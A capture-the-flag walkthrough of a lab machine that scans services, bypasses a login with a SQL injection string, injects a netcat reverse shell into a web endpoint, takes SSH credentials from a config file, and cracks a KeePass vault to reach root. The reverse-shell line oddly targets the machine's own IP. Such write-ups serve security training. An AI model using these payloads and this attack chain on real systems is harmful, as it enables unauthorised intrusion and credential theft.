Silent-Monitor TryHackMe CTF Walkthrough

Silent-Monitor CTF

Enumerate a running internal service, exploit a vulnerable web application, pivot through the system, and crack your way to root.

1. Network Reconnaissance

We start by scanning the target machine to discover open ports and services.

nmap -sS -p- 10.49.129.115

nmap -sS -p- 10.49.129.115

• -sS → Stealth SYN scan
• -p- → Scan all 65,535 ports

This reveals which services are running.

2. Service Enumeration

Once we know the ports, we dig deeper into specific ones:

nmap -sS -sC -sV -p22,5050 10.49.129.115

nmap -sS -sC -sV -p22,5050 10.49.129.115

• Port 22 → SSH
• Port 5050 → Werkzeug (Python backend server)
• OS → Linux

3. Local DNS Resolution

To make the target easier to reference, add it to /etc/hosts:

echo "10.49.129.115 corpnet.thm" >> /etc/hosts

echo "10.49.129.115 corpnet.thm" >> /etc/hosts

Now we can use corpnet.thm instead of the IP.

4. Web Application Recon

Visit the site:

http://corpnet.thm:5050/

http://corpnet.thm:5050/

We see a homepage, so let's enumerate directories.

gobuster dir -u http://corpnet.thm:5050 -w /usr/share/wordlists/dirb/big.txt -z

gobuster dir -u http://corpnet.thm:5050 -w /usr/share/wordlists/dirb/big.txt -z

This helps us discover hidden paths.

5. Authentication Bypass

On the internal login page:

http://corpnet.thm:5050/internal

http://corpnet.thm:5050/internal

We bypass authentication using a simple SQL injection:

' or 1 = 1;--

' or 1 = 1;--

This logs us in as notops.

6. Command Injection

Inside the /internal/health endpoint, we intercept requests with Burp Suite and inject a reverse shell:

busybox nc 10.49.129.115 4444 -e sh

busybox nc 10.49.129.115 4444 -e sh

On our machine, we listen with Netcat or Penelope.py.

Result: shell access as www-data.

We then read secret.config.

7. SSH Login

From secret.config, we obtain SSH credentials for sysadmin:

ssh sysadmin@corpnet.thm

ssh sysadmin@corpnet.thm

Now we have full access as sysadmin.

here found user flag.

8. Privilege Escalation to Root

We find an infrastructure.kdbx file (KeePass database). Steps:

• Transfer the file to our machine.

keepass2john infrastructure.kdbx > keepass_hash

keepass2john infrastructure.kdbx > keepass_hash

• Generate hash with keepass2john:
• Crack the hash using John the Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt keepass_hash

john --wordlist=/usr/share/wordlists/rockyou.txt keepass_hash

• With the cracked password, open the KeePass database.

• Extract the root user password.
• SSH into root:

ssh root@corpnet.thm

ssh root@corpnet.thm

Found the root flag 🎉

✨ Final Takeaways

• Recon → Enumeration → Exploitation → Escalation is the natural flow.
• SQL injection and command injection are common entry points.
• Config files and password vaults (like KeePass) often hold the keys to higher privileges.
• Always check for sensitive files after gaining initial access.